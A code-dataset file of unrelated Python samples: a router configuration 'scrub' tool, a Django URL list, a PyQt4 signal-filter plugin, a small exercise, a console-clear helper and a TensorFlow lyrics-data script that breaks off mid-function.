# an address is defined with name in router, the name can be any unique so is taken from ip address
# itself by converting its non integers like '.' , '/', ':' to '-'.
item['source_address_name'] = ADDRESS_NAME_SUB_PATTERN.sub('-', item['source_address'])
item['destination_address_name'] = ADDRESS_NAME_SUB_PATTERN.sub('-', item['destination_address'])
mgmt_access_addresses.append(item)
template_data: Optional[Dict[str, Any]]
template_data = {
'name_servers': settings.ROUTER_NAME_SERVERS,
'mgmt_access_addresses': mgmt_access_addresses,
'robot_rsa': settings.ROBOT_RSA,
'rocky_rsa': settings.ROCKY_RSA,
'administrator_encryp_pass': settings.ADMINISTRATOR_ENCRYP_PASS,
'api_user': settings.API_USER_PASS,
'radius_server_address': settings.RADIUS_SERVER_ADDRESS,
'radius_server_secret': settings.RADIUS_SERVER_SECRET,
'location': the_pod['location'],
'name': the_pod['name'],
}
utils.line_break()
print()
# Get the oob router
utils.colour_print('(colour_prompt)Please enter correct OOB ip of the router to be scrubbed(colour_clear).')
utils.colour_print('\r - e.g 10.S.R.U where S:site number; R:rack number; U:unit location')
utils.colour_print('\r - each must be in range 0-254')
oob_ip = self.user_input_valid_address('')
utils.line_break()
print()
# SSHing into router for router model
utils.colour_print('(colour_prompt)Fetching the router model...(colour_clear)')
router_model = RouterScrub.router_model(oob_ip)
if not router_model:
utils.error(f'Failed to fetch router model for given ip #{oob_ip}, Check the oob ip and try again.')
return
utils.colour_print(
f'The router model for given ip #{oob_ip} is (colour_success){router_model}(colour_clear)',
)
utils.line_break()
print()
# oob 10.S.R.U S:site; R:rack; U:unit
template_data['router'] = {
'router_ip': oob_ip,
'router_location': oob_ip.replace('.', ''), # 10SRU
'router_model': router_model,
}
# sshing into router for root encrypted password
utils.colour_print('(colour_prompt)Fetching the root encrypted password...(colour_clear)')
root_encrypt_password = RouterScrub.root_encrypted_password(oob_ip)
if not root_encrypt_password:
utils.error(f'Failed to fetch root encrypted password from router.')
return
utils.colour_print(
f'Found root encrypted password of router #{oob_ip}',
)
template_data['root_encrypted_password'] = root_encrypt_password
utils.line_break()
print()
# confirm if router model is fibre or copper in case SRX345-DUAL-AC
if router_model in ['SRX345-DUAL-AC', 'SRX345']:
router_model = 'SRX345'
utils.colour_print('(colour_prompt)Type of router cabling: ')
utils.colour_print('(colour_prompt)\r - 1. Copper')
utils.colour_print('(colour_prompt)\r - 2. Fibre')
option = ''
while option not in ['1', '2']:
option = utils.user_input_validate(
utils.colour('(colour_warning)Please enter "1" for Copper or "2" for Fibre.(colour_clear)'),
)
if str(option) == '1':
router_model = f'{router_model}-Copper'
utils.colour_print(f'(colour_prompt)Preparing router scrub for {router_model}...(colour_clear)')
if str(option) == '2':
router_model = f'{router_model}-Fibre'
utils.colour_print(f'(colour_prompt)Preparing router scrub for {router_model}...(colour_clear)')
else:
utils.colour_print(f'(colour_prompt)Preparing router scrub for {router_model}...(colour_clear)')
utils.line_break()
print()
# Prepare the router's specs from json.
try:
with open('data/router_specs.json', 'r') as f:
template_data['ports'] = json.load(f)['routers'][f'{router_model}']
except:
utils.error('An error occurred while preparing router scrub')
traceback.print_exc()
return
# Collect the template data.
for port in template_data['ports']:
# oob is already taken
if port['function'] == 'OOB':
port['port_configs'].append(
{
'ip': oob_ip,
'mask': 16, # /16 for oob is by design, if changes should reflect here.
'type': 'inet',
'gateway': f'10.{oob_ip.split(".")[1]}.0.1',
},
)
# Management
if port['function'] == 'Management':
for address in mgmt_port_config:
ip = address['address_range'].split('/')
port['port_configs'].append(
{
'ip': ip[0],
'mask': ip[1],
'type': 'inet6' if netaddr.IPAddress(ip[0]).version == 6 else 'inet',
'gateway': address['gateway'],
},
)
# Public
if port['function'] == 'Floating':
for address in public_port_config:
ip = address['address_range'].split('/')
port['port_configs'].append(
{
'ip': ip[0],
'mask': ip[1],
'type': 'inet6' if netaddr.IPAddress(ip[0]).version == 6 else 'inet',
'gateway': address['gateway'],
},
)
# All data check
label = f'Router #{router_model} {oob_ip} ports and IPs'
utils.colour_print(
'┌─────────────────────────────────────────────────────────────────────────────────────────┐',
)
utils.colour_print(f'│{label:^89}│')
utils.colour_print(
'├───────────┬─────────────┬───────────────────────────┬───────┬───────────────────────────┤',
)
utils.colour_print(
'│ Name │ Function │ IPs │ Mask │ Gateway │',
)
utils.colour_print(
'├───────────┼─────────────┼───────────────────────────┼───────┼───────────────────────────┤',
)
for port in template_data['ports']:
function = port['function']
name = port['name']
if function != 'Private':
port_configs = port['port_configs']
for i, ip in enumerate(port_configs):
# proper print
if i == 0:
utils.colour_print(
f'│{name:^11}│{function:^13}│{ip["ip"]:^27}│{ip["mask"]:^7}│{ip["gateway"]:^27}│',
)
else:
utils.colour_print(
f'│{"":^11}│{"":^13}│{ip["ip"]:^27}│{ip["mask"]:^7}│{ip["gateway"]:^27}│',
)
else:
utils.colour_print(
f'│{name:^11}│{function:^13}│{"-":^27}│{"-":^7}│{"-":^27}│',
)
utils.colour_print(
'└───────────┴─────────────┴───────────────────────────┴───────┴───────────────────────────┘')
utils.line_break()
yes = input(
utils.colour('If you want to continue press Y or y, else press any key to stop.: '),
)
utils.line_break()
print()
if yes in ['Y', 'y']:
RouterScrub.scrub(template_data)
except:
utils.error('An error occurred while configuring ports on router')
traceback.print_exc()
@staticmethod
def validate_address(address):
"""
validates the given address or address range
"""
try:
if netaddr.IPNetwork(address):
return True
        except Exception:
            pass
utils.colour_print(f'(colour_warning) {address} is not a valid IP address.(colour_clear)')
return False
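    # Illustrative examples (not in the original): validate_address('10.0.0.0/24')
    # returns True, while validate_address('not-an-ip') prints the warning above
    # and returns False, since netaddr.IPNetwork raises on malformed input.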
@classmethod
def user_input_valid_address(cls, print_statement: str):
"""
takes user input and verifies and return valid address.
"""
address = ''
while address == '':
address = utils.user_input_validate(print_statement)
if address:
if cls.validate_address(address):
break
address = ''
return address
@classmethod
def validate_firewall(cls, firewall):
"""
takes a firewall rule dict with source address, destination address, port and protocol
:param firewall:
:return: nothing if everything is right otherwise fails gracefully
"""
if 'source_address' not in firewall.keys():
utils.error(f'"source_address" is not defined for firewall # {firewall}')
exit()
if firewall['source_address'] == 'any':
pass
elif not cls.validate_address(firewall['source_address']):
utils.error(f'Invalid "source_address" for firewall # {firewall}')
exit()
if 'destination_address' not in firewall.keys():
utils.error(f'"destination_address" is not defined for firewall # {firewall}')
exit()
if firewall['destination_address'] == 'any':
pass
elif not cls.validate_address(firewall['destination_address']):
utils.error(f'Invalid "destination_address" for firewall # {firewall}')
exit()
if 'port' not in firewall.keys():
utils.error(f'"port" is not defined for firewall #{firewall}')
exit()
if firewall['port'] == 'any':
pass
else:
ports = firewall['port'].split('-')
for port in ports:
if int(port) not in range(65536):
                    utils.error(f'Invalid port value # {port} of firewall #{firewall}, it must be in range 0 to 65535')
exit()
if 'protocol' not in firewall.keys():
utils.error(f'"protocol" is not defined for firewall #{firewall}')
exit()
        if firewall['protocol'] not in ['tcp', 'udp', 'any']:
            utils.error(f'Invalid protocol for firewall #{firewall}, it can only be "tcp", "udp" or "any".')
            exit()
| StarcoderdataPython |
60182 | <reponame>Brownie-in-Motion/libwherey
from django.contrib import admin
from django.urls import path
from django.conf.urls import url
import web.views
urlpatterns = [
path('admin/', admin.site.urls),
url(r"^$", web.views.homepage),
url(r"^about$", web.views.about),
url(r"^api/libraries/(?P<pk>[0-9]+)$", web.views.LibraryDetail.as_view()),
url(r"^api/libraries$", web.views.LibraryList.as_view()),
]
| StarcoderdataPython |
4802117 | '''
Created on 29.11.2016
@author: simon
'''
from plugins import plugins
from PyQt4 import QtGui,QtCore
from ctools.filters import IIR
from scipy.signal.filter_design import iirfilter
class BandPass(object):
'''
Plugin for PyDaq which adds some filters (iir and fft)
'''
def __init__(self, app):
'''
Adds a Dialog for applying a Bandpassfilter with cutoff-frequncies f1,f2 to the underlying data.
@type app: gui.qtgui.UI_Main
'''
filter=QtGui.QAction("BandFilter",app)
app.ui.plotcontrols.addAction(filter)
filter.triggered.connect(lambda: FilterDialog(app).show() if not FilterDialog.instance else FilterDialog.instance.restore())
pass
class FilterDialog(QtGui.QDialog):
"""
Dialog to apply a Filter to a line drawn by gui.plot2. For each line an instance of
BandpassWidget is added
"""
instance=None
def __init__(self, app):
"""
@type app: gui.qtgui.UI_Main
"""
QtGui.QDialog.__init__(self, app)
FilterDialog.instance=self
self.setWindowTitle("Filters")
self.app=app
self.colsAdjusted=0
lo=QtGui.QGridLayout()
#lo.setAlignment(QtCore.Qt.AlignCenter)
self.setLayout(lo)
i=0
self.resize(500,200)
lbls="Line,Type,Band,Order,fmin,fmax,FFT,Invert,On".split(',')
self.header=[]
for s in lbls:
lbl=QtGui.QLabel(s)
lo.addWidget(lbl,0,i)
self.header.append(lbl)
i+=1
i=0
frame=QtGui.QScrollArea()
frame.setFrameShape(0)
qslo=QtGui.QGridLayout()
qslo.setMargin(0)
qslo.setAlignment(QtCore.Qt.AlignTop)
frame.setLayout(qslo)
lo.addWidget(frame,1,0,2,0)
if not hasattr(app, 'bandpassfilters'):
app.bandpassfilters={}
for l in app.plot.lines:
bpw=app.bandpassfilters.get(l) or BandPassWidget(app,l)
app.bandpassfilters[l]=bpw
i+=1
#lbl=QtGui.QLabel("Line %d"%i)
row=i-1
#bpw.f1.setMaximum(app.plot.samplerate/2)
#bpw.f2.setMaximum(app.plot.samplerate/2)
#qslo.addWidget(lbl,row,0)
col=0
for w in bpw.widgets:
#w.resize(30,10)
qslo.addWidget(w,row,col)
col+=1
def paintEvent(self, *args, **kwargs):
"""
hook into paintevent to resize the second grid layout according to the first one
"""
QtGui.QDialog.paintEvent(self, *args, **kwargs)
try:
if self.colsAdjusted>2:return
header=self.header[:]
cols=self.app.bandpassfilters.values()[0].widgets
for i in range(min(len(header),len(cols))):
w1=cols[i].width()
w2=header[i].width()
if w1>w2: header[i].setMinimumWidth(w1)
else : cols[i].setMinimumWidth(w2)
self.colsAdjusted+=1
self.update()
except Exception,e: print e
def restore(self):
"""
restore the window when it was previously closed
"""
self.show()
self.activateWindow()
def hideEvent(self, *args, **kwargs):
"""
        Closing the window doesn't destroy it by default.
        Force destruction here.
"""
self.destroy()
FilterDialog.instance=None
return QtGui.QDialog.hideEvent(self, *args, **kwargs)
class BandPassWidget(QtGui.QWidget):
"""
This class holds all widgets for adjusting the filteroptions.
"""
def __init__(self, app,line):
"""
Create all neccessary widgets
@type app: gui.qtgui.UI_Main
"""
QtGui.QWidget.__init__(self,app)
filters=["butter","cheby1","cheby2","ellip","bessel"]
btypes=["band","low","high"]
srate=app.plot.samplerate/2
self.plot=app.plot
self.line=line
lbl=QtGui.QLabel("Line %d"%self.plot.lines.index(line))
self.setWindowTitle("BandPass")
self.f1=QtGui.QSpinBox()
self.f2=QtGui.QSpinBox()
self.f1.setMaximum(99999999)
self.f2.setMaximum(99999999)
self.f1.setMinimumWidth(60)
self.f2.setMinimumWidth(60)
self.f2.setValue(srate)
self.filterBox=QtGui.QComboBox()
self.filterBox.addItems(filters)
self.btypesBox=QtGui.QComboBox()
self.btypesBox.addItems(btypes)
self.useFftCb=QtGui.QCheckBox()
self.useFftCb.stateChanged.connect(self.restart)
self.useFft=0
self.useFftFallBack=0
self.inv=QtGui.QCheckBox()
self.en=QtGui.QCheckBox()
self.orderW=QtGui.QSpinBox()
self.orderW.setMinimum(1)
self.widgets=[lbl,self.filterBox,self.btypesBox,self.orderW,self.f1,self.f2,self.useFftCb,self.inv,self.en]
self.bpf=IIRFilter(line.buffer.data, 0, srate,app.plot.samplerate)
self.f1.valueChanged.connect(self.changed)
self.f2.valueChanged.connect(self.changed)
self.orderW.valueChanged.connect(self.changed)
self.en.stateChanged.connect(self.toggle)
self.inv.stateChanged.connect(self.changed)
self.btypesBox.currentIndexChanged.connect(self.changed)
self.filterBox.currentIndexChanged.connect(self.changed)
app.plot.sigBufferChanged.connect(self.bufchanged)
def bufchanged(self):
"""
Update the filters frequency scaling on bufferlength-changes
"""
self.bpf.updateValues(self.line.buffer.data)
def changed(self,*args,**kwarg):
"""
Update the filter according to the changed values in gui
"""
f1=self.f1.value()
f2=self.f2.value()
if f2>self.plot.samplerate/2:f2=self.plot.samplerate/2
btype=self.btypesBox.currentText()
self.f1.setEnabled(True)
self.f2.setEnabled(True)
if btype=='low':
self.f1.setEnabled(False)
f1=False
elif btype=='high':
self.f2.setEnabled(False)
f2=False
elif btype=='band':
if f1>f2:f1=f2
self.f1.setValue(f1)
self.f2.setValue(f2)
if self.useFftCb.isChecked(): self.useFft=1
else: self.useFft=0
#try to use iir filter when in fallbackmode
if self.useFftFallBack:
self.useFftFallBack=0
self.useFft=0
self.useFftCb.setChecked(False)
try:self.bpf.updateValues(self.line.buffer.data,f1, f2,self.inv.isChecked(),
order=self.orderW.value(),ftype=str(self.filterBox.currentText()))
except ValueError:
#Fallback to FFT filter-fode
if not self.useFft:
self.useFftCb.setChecked(1)
self.useFft=1
self.toggle()
self.useFftFallBack=1
return
def toggle(self):
"""
Toggle the filter on or off.
"""
#remove all filter added by this plugin
try:
while 1:self.line.prefilters.remove(self.bpf.getData)
except: pass
try:
while 1:self.line.preappend_filters.remove(self.bpf.iirArr)
except: pass
#add filter as specified by the user
if self.en.isChecked():
if self.useFft:
self.line.prefilters.append(self.bpf.getData)
else:
self.line.preappend_filters.append(self.bpf.iirArr)
def restart(self):
self.changed()
if self.en.isChecked():
self.en.setChecked(False)
self.toggle()
self.en.setChecked(True)
self.toggle()
import numpy as np
try:
from scipy import fftpack as fft
except ImportError:
from numpy import fft
from gui.plot2 import bestFFTlength
import time
class BandPassFilter:
"""
A Filter based on FFT.
"""
def __init__(self,a,f1,f2,srate):
"""
:param a: numpy_array with data to filter
        :param f1: lower cutoff frequency. Filter is low pass if f1=0
        :param f2: upper cutoff frequency. Filter is highpass if f2=0
:param srate: Samplerate
"""
self.srate=srate
self.a=a
self.ftype='butter'
self.inverted=False
self.order=1
self.updateValues(a,f1,f2,False)
def getData(self,x,y):
"""
return the filtered data
"""
y=y[:self.bestfftl]
out= x[:self.bestfftl],np.real(fft.ifft(fft.fft(y)*self.af))
return out
def getarray(self,arr):
#if arr.shape[0]!=self.af.shape[0]: pass
return np.real(fft.ifft(fft.fft(arr)*self.makeAf(arr)))
def makeAf(self,arr):
i1=self.i1=self.f1*len(arr)/self.srate+1
i2=self.i2=self.f2*len(arr)/self.srate+1
self.af=np.zeros(arr.shape[0])
self.af[i1:i2]=1
self.af[-i2:-i1]=1
return self.af
def updateValues(self,a=None,f1=None,f2=None,inverted=None,order=None,ftype=None):
"""
Update filter params
:param a: data array
:param f1: lower cutoff freq
:param f2: upper cutoff freq
:param order: the filters order
:param ftype (str): the filtertype, one of butter, cheby1 cheby2, ellip or bessel
:raise exception: ValueError if filter will be unstable
"""
if f1 is not None: self.f1=f1
if f2 is not None: self.f2=f2
if a is not None:self.a = a
if order: self.order=order
if ftype is not None and ftype in ['butter','cheby1','cheby2','ellip','bessel']:
self.ftype=ftype
i1=self.i1=self.f1*len(self.a)/self.srate if self.f1 else False
i2=self.i2=self.f2*len(self.a)/self.srate if self.f2 else False
self.bestfftl=bestFFTlength(len(self.a))
self.a=self.a[:self.bestfftl]
if not inverted:
self.af=self.makeG(i1, i2)
#self.af=np.zeros(self.a.shape[0])
#self.af[i1:i2]=1
#self.af[-i2:-i1]=1
else:
self.af=np.ones(self.a.shape[0])
self.af[i1:i2]=0
self.af[-i2:-i1]=0
def _makeG(self,i1,i2):
x=np.arange(1,self.a.shape[0]+1,dtype="f")*1j
l=self.a.shape[0]
n=self.order#*2
print i1,i2,l
y=None
if not i1: y=1/(1+(x/i2)**(2*n))
elif not i2: y=1/(1+(i1/x)**(2*n))
else:y=1/(1+(i1/x)**(2*n))*1/(1+(x/i2)**(2*n))
y=y**0.5
try: y[l/2::]=y[:l-l/2][::-1]
except ValueError: pass
return np.abs(y)
def makeG(self,i1,i2):
"""
Generates Gainfunction G(s)=|H(s)|
"""
print "makingG:",i1,i2
x=np.arange(1,self.a.shape[0]+1,dtype='f')
k=1 #gain factor
n=self.order
if i1 and i2:
x=tflpbp(x, i1, i2)
#n=2*n
elif i1:
x=tflphp(x, i1)
elif i2:
x=tflplp(x, i2)
y=None
if self.ftype=='butter': y=gButter(x, n)
elif self.ftype=='cheby1': y=gCheby1(x, n)
k=1/np.nanmax(y)
print i1,i2,k
l=self.a.shape[0]
y[l/2::]=y[:l-l/2][::-1]
return y*k
from threading import Lock
class IIRFilter(BandPassFilter):
def __init__(self, a, f1, f2, srate):
self.iir=IIR(f1=f1,f2=f2,samplerate=srate)
self.lock=Lock()
BandPassFilter.__init__(self, a, f1, f2, srate)
def updateValues(self, a=None, f1=None, f2=None, inverted=None, order=1,ftype='butter'):
BandPassFilter.updateValues(self, a=a, f1=f1, f2=f2, inverted=inverted, order=order,ftype=ftype)
btype='bandpass'
if f1 is not None or f2 is not None:
if f1: f1=f1/(0.5*self.srate)
if f2: f2=f2/(0.5*self.srate)
fs=(f1,f2)
if not f1 and f2:
fs=f2
btype='lowpass'
if not f2 and f1:
fs=f1
btype='highpass'
b,a=iirfilter(order,fs,ftype=ftype,btype=btype,rp=.1,rs=10)
#print b,a
stable=np.all(np.abs(np.roots(a))<1)
if not stable:
raise ValueError("The filter is not stable")
#TODO: Fallback to fft mode
with self.lock:
self.iir.set_ba(b,a)
#self.iir=IIR(b,a)
def iirArr(self,arr):
out=[]
with self.lock:
out=self.iir.filterArr(arr)
#print np.asarray(out)
return out
pass
def butterpoles(n,k):
return np.exp(1j*(2*k+n-1)*np.pi/2/n )
def butter(x,n):
dn=1
for k in xrange(n): dn*=x-butterpoles(n, k)
return 1/dn
def gButter(x,n):
return 1/(1+x**(2*n))**0.5
def gCheby1(x,n,epsilon=.1):
return 1/(1+(epsilon*cheby(x,n))**2)**0.5
def gCheby2(x,n,epsilon=.1):
return 1/(1+1/(epsilon*cheby(1/x,n))**2)**0.5
def cheby(x,n):
x1 = lambda x:np.cos(n*np.arccos(x))
x2=lambda x: np.cosh(n*np.arccosh(x))
return np.piecewise(x,[x<=1,x>1],[x1,x2])
def tflplp(x,fc): return x/fc
def tflphp(x,fc): return fc/x
def tflpbp(x,f1,f2):
f0=(f1*f2)**.5
df=f2-f1
q= f0/df
return q*(x/f0+f0/x)
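# tflplp/tflphp/tflpbp above are the standard frequency transforms that map a
# low-pass prototype onto low-pass, high-pass and band-pass responses
# (x/fc, fc/x and q*(x/f0 + f0/x) respectively); gButter/gCheby1/gCheby2 then
# evaluate the prototype gain |H| along the transformed frequency axis.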
plugins.append(BandPass) | StarcoderdataPython |
3288405 | '''
Write a program to get integers m and n (n is an even number), then display m lines of the output.
Each line shows n symbols. The first half (1 to n / 2) of each line displays ‘>’ and the second half (n / 2 +
1 through n) display ‘<’.
'''
m, n = map(int, input().split())
for _ in range(m):
print('>'*(n//2), '<'*(n//2), sep='')
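# Example (illustrative): the input "3 6" prints three lines of ">>><<<".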
| StarcoderdataPython |
101452 | <filename>help/help.py
from os import path, system, name
def clear():
"""
Clear console function os-independent
:return: NoneType
"""
if name == 'nt':
system('cls')
else:
system('clear')
| StarcoderdataPython |
4806574 | import math
import tensorflow
import tensorflow as tf
import tensorflow_datasets as tfds
import tensorflow_addons as tfa
import json
import os
import time
from ftfy import fix_text
# os.chdir('../')
import pickle
import numpy as np
import string, os
from gensim.models import KeyedVectors
import gensim.downloader as api
from tensorflow.keras.models import Model
from tensorflow.keras.layers import Dense, Input, Dropout, LSTM, Activation, Bidirectional
from tensorflow.keras.layers import Embedding
from tensorflow.keras.preprocessing import sequence
from tensorflow.keras.initializers import glorot_uniform
from tensorflow.keras.callbacks import LambdaCallback, ModelCheckpoint
from tensorflow.keras.preprocessing.text import Tokenizer
from tensorflow.keras.preprocessing.sequence import pad_sequences
import tensorflow.keras.utils as ku
from sklearn.model_selection import train_test_split
import random
import sys
from datetime import date
from collections import Counter
import matplotlib.pyplot as plt
from src.features.build import Lyrics
from src.features.transform_data import Transform
from random import shuffle
from tensorflow.python.framework import tensor_shape
from tokenizers import CharBPETokenizer, BertWordPieceTokenizer
from transformers import GPT2Model, GPT2Config, GPT2Tokenizer
physical_devices = tf.config.list_physical_devices('GPU')
tf.config.experimental.set_memory_growth(physical_devices[0], enable=True)
def clean_text(txt):
txt = "".join(v for v in txt if v not in string.punctuation).lower()
txt = txt.encode("utf8").decode("ascii",'ignore')
return txt
def split_input_target(chunk):
input_text = chunk[:-1]
target_text = chunk[1:]
return input_text, target_text
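# Illustrative example (not in the original): split_input_target([1, 2, 3, 4])
# returns ([1, 2, 3], [2, 3, 4]); the target is the input shifted by one token,
# which is the usual setup for next-token (language model) prediction.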
def load_data():
data_dir = 'data/processed/verses.txt'
with open(data_dir, "r") as fp: # Unpickling
lyrics = fp.read()
lyrics_clean = clean_text(lyrics)
def word_based():
_t = Lyrics(32,10000)
#arr = _t.verse_lines
corpus = _t.lyrics
tokenizer = Tokenizer()
def get_sequence_of_tokens(corpus):
## tokenization
tokenizer.fit_on_texts(corpus)
total_words = len(tokenizer.word_index) + 1
# convert data to sequence of tokens
input_sequences = []
for line in corpus:
token_list = tokenizer.texts_to_sequences([line])[0]
for i in range(1, len(token_list)):
n_gram_sequence = token_list[:i+1]
input_sequences.append(n_gram_sequence)
return input_sequences, total_words
inp_sequences, total_words = get_sequence_of_tokens(corpus)
num_words = total_words
print(inp_sequences[:10])
input_sequences = inp_sequences
max_sequence_len = max([len(x) for x in input_sequences])
    input_sequences = np.array(pad_sequences(input_sequences, maxlen=max_sequence_len+1, padding='pre'))
    predictors, label = input_sequences[:, :-1], input_sequences[:, -1]
    return tokenizer, num_words, tf.data.Dataset.from_tensor_slices((predictors, label))
# In[ ]:
# def tf_encode(pt, en):
# result_pt, result_en = tf.py_function(encode, [pt, en], [tf.int64, tf.int64])
# result_pt.set_shape([None])
# result_en.set_shape([None])
#
# return result_pt, result_en
#
#
# def filter_max_length(x, y, max_length=MAX_LENGTH):
# return tf.logical_and(tf.size(x) <= max_length,
# tf.size(y) <= max_length)
#
# def fetch_dataset(train_dataset, val_dataset, batch_size, padded_shapes=([-1], [-1]), epoch=25, buffer_size=10000):
# train_dataset = train_dataset.map(tf_encode)
# train_dataset = train_dataset.filter(filter_max_length)
# # cache the dataset to memory to get a speedup while reading from it.
# train_dataset = train_dataset.cache()
# train_dataset = train_dataset.shuffle(buffer_size).padded_batch(batch_size)
# train_dataset = train_dataset.repeat(epoch)
# train_dataset = train_dataset.prefetch(tf.data.experimental.AUTOTUNE)
#
#
# val_dataset = val_dataset.map(tf_encode)
# val_dataset = val_dataset.filter(filter_max_length).padded_batch(batch_size)
# return train_dataset, val_dataset
def verse_pairs_approach(target_vocab_size=2**12):
_t = Transform()
arr = [i for i in _t.verse_lines if len(i) > 0]
dataset = list()
for verse in arr:
if max([len(i.split()) for i in verse]) > 1 and max([len(i.split()) for i in verse]) < 25:
chunk_number = len(verse) // 4
# chunks = [verse[x:x+chunk_number] for x in range(0, len(verse), chunk_number)]
if chunk_number != 0:
chunks = ['<START> ' + ''.join([ j + ' <NEWLINE> ' for j in verse[x:x+chunk_number]]) + ' <END>' for x in range(0, len(verse), chunk_number)]
chunks = [chunk for chunk in chunks if len(chunk.split('<NEWLINE>')) > 2]
dataset.append((chunks[:2], chunks[2:]))
# for i in arr:
# tmp = [ ' <NEWLINE> '.join([clean_text(j[0]), clean_text(j[1])]) for j in zip(i[0::2],i[1::2])]
# dataset.append([z for z in zip(tmp[0::2], tmp[1::2])])
example = [x[0] for x in dataset]
target = [x[1] for x in dataset]
print(example[:2], target[:2])
X_train, X_test, y_train, y_test = train_test_split(example, target, test_size=0.10, shuffle=True)
len(X_train)
train_examples = tf.data.Dataset.from_tensor_slices((X_train, y_train))
val_examples = tf.data.Dataset.from_tensor_slices((X_test, y_test))
tokenizer_pt = tfds.features.text.SubwordTextEncoder.build_from_corpus(
(pt.numpy() for pt, en in train_examples), target_vocab_size=target_vocab_size, reserved_tokens=['<UNK>','<NEWLINE>','<START>','<END>'])#, reserved_tokens=['<UNK>'])
tokenizer_en = tfds.features.text.SubwordTextEncoder.build_from_corpus(
(en.numpy() for pt, en in train_examples), target_vocab_size=target_vocab_size,reserved_tokens=['<UNK>','<NEWLINE>','<START>','<END>']) #reserved_tokens=['<UNK>'])
BUFFER_SIZE = 15000
BATCH_SIZE = 32
def encode(lang1, lang2):
lang1 = [tokenizer_pt.vocab_size] + tokenizer_pt.encode(lang1.numpy()) + [tokenizer_pt.vocab_size+1]
lang2 = [tokenizer_en.vocab_size] + tokenizer_en.encode(lang2.numpy()) + [tokenizer_en.vocab_size+1]
return lang1, lang2
def tf_encode(pt, en):
result_pt, result_en = tf.py_function(encode, [pt, en], [tf.int64, tf.int64])
result_pt.set_shape([None])
result_en.set_shape([None])
return result_pt, result_en
MAX_LENGTH = 125
def filter_max_length(x, y, max_length=MAX_LENGTH):
return tf.logical_and(tf.size(x) <= max_length,
tf.size(y) <= max_length)
train_dataset = train_examples.map(tf_encode)
train_dataset = train_dataset.filter(filter_max_length)
# cache the dataset to memory to get a speedup while reading from it.
train_dataset = train_dataset.cache()
train_dataset = train_dataset.shuffle(BUFFER_SIZE).batch(BATCH_SIZE)
train_dataset = train_dataset.prefetch(tf.data.experimental.AUTOTUNE)
val_dataset = val_examples.map(tf_encode)
val_dataset = val_dataset.filter(filter_max_length).padded_batch(BATCH_SIZE)
return train_dataset, val_dataset, tokenizer_en, tokenizer_pt
def verse_by_verse(test_size=.10, shuffle=False, target_vocab_size=2**12):
_t = Transform()
arr = _t.verse_lines
dataset = list()
for verse in arr:
x = verse[0::2]
y = verse[1::2]
#[print(i) for i in zip(x, y)]
# dataset +=
#print(dataset[0])
if shuffle:
np.random.shuffle(dataset)
train = dataset[:round(len(dataset) * test_size)]
test = dataset[round(len(dataset) * test_size):]
train_examples = tf.data.Dataset.from_tensor_slices(train)
val_examples = tf.data.Dataset.from_tensor_slices(test)
tokenizer_en = tfds.features.text.SubwordTextEncoder.build_from_corpus(
(en.numpy() for pt, en in train_examples), target_vocab_size=target_vocab_size)
tokenizer_pt = tfds.features.text.SubwordTextEncoder.build_from_corpus(
(pt.numpy() for pt, en in train_examples), target_vocab_size=target_vocab_size)
return train_examples, val_examples, tokenizer_en, tokenizer_pt
def fill_in_the_blank(test_size=.10, shuffle=False, target_vocab_size=2**12):
_t = Transform()
arr = _t.verse_lines
data_dir = 'data/processed/verses.txt'
with open(data_dir, "rb") as fp: # Unpickling
lyrics = pickle.load(fp)
arr = [[j for j in i.split(' \n ') if len(j) > 1 and '\n\n' != j] for i in list(np.array(lyrics)) if len(i.split(' \n ')) > 0]#tokenizer = BertWordPieceTokenizer()
#tokenizer.train(['data/processed/verses_encoded.txt'])
tokenizer = GPT2Tokenizer.from_pretrained('gpt2')
#special_tokens_dict = {'bos_token':'|START|', 'eos_token':'|END|', 'unk_token':'|UNK|', 'sep_token':'|SEP|', 'pad_token':'|PAD|', 'cls_token':'|CLS|', 'mask_token':'|MASK|'}
#num_added_toks = tokenizer.add_special_tokens(special_tokens_dict)
#print('We have added', num_added_toks, 'tokens')
#model.resize_token_embeddings(len(tokenizer))
#tokenizer.add_tokens(['<START>','<END>'])
dataset = list()
for verse in arr:
num_times = random.randint(1, 5)
try:
if max([len(i.split()) for i in verse]) > 1 and max([len(i.split()) for i in verse]) < 50:
chunk_number = len(verse) // 3
chunks = [verse[x:x+chunk_number] for x in range(0, len(verse), chunk_number)]
#chunks = ['<START> ' + ''.join([ j for j in verse[x:x+chunk_number]]) for x in range(0, len(verse), chunk_number)]
#chunks = [chunk for chunk in chunks if len(chunk.split('<NEWLINE>')) > 2]
chunk_list = [' '.join(chunk_verse).split() for chunk_verse in chunks]
for chunk in chunk_list:
for _ in range(0, num_times,1):
mask = np.random.random(len(chunk))
mask_bool = random.uniform(.3, .4)
mask_x = mask > mask_bool
mask_y = mask < mask_bool
x = '<START> ' + ' '.join(['[MASK]' if not x else chunk[i] for i, x in enumerate(mask_x)]) + ' <END>'
#x = ' '.join(np.array(verse)[mask_x].tolist())
#y = ' '.join(np.array(chunk).tolist())
#$y = ' '.join(['' if not x else chunk[i] for i, x in enumerate(mask_y)])
#y = '|<GAP>|'.join(['' if not x else chunk[i] for i, x in enumerate(mask_y)])
y = '<START> ' + ' '.join(['[MASK]' if x else chunk[i] for i, x in enumerate(mask_x)]) + ' <END>'
# = ' '.join([np.array(i)[mask_y] for i in chunk])
# x = ' '.join(np.array(chunk)[mask_x].tolist())
# y = ' '.join(np.array(chunk)[mask_y].tolist())
#x = ' '.join([' ' if not x else chunk.split(' ')[i] for i, x in enumerate(mask_x)])
#x = ' '.join([' ' if not x else chunk.split(' ')[i] for i, x in enumerate(mask_x)])
#y = chunk
dataset.append((x, y))
except ValueError:
pass
print(dataset[0])
example = np.array(pad_sequences([tokenizer.encode(x[0]) for x in dataset], padding='post'))
target = np.array(pad_sequences([tokenizer.encode(x[1]) for x in dataset], padding='post'))
# target = [tokenizer.encode(x[1]).ids for x in dataset]
print(len(dataset))
print(dataset[0])
X_train, X_test, y_train, y_test = train_test_split(example, target, test_size=0.10, shuffle=True)
train_examples = tf.data.Dataset.from_tensor_slices((X_train, y_train))
val_examples = tf.data.Dataset.from_tensor_slices((X_test, y_test))
#tokenizer_pt = tfds.features.text.SubwordTextEncoder.build_from_corpus(
# (pt.numpy() for pt, en in train_examples), target_vocab_size=target_vocab_size)#, reserved_tokens=['<UNK>'])
#tokenizer_en = tfds.features.text.SubwordTextEncoder.build_from_corpus(
# (en.numpy() for pt, en in train_examples), target_vocab_size=target_vocab_size)#,reserved_tokens=['<UNK>'])
BUFFER_SIZE = 15000
BATCH_SIZE = 64
def encode(lang1, lang2):
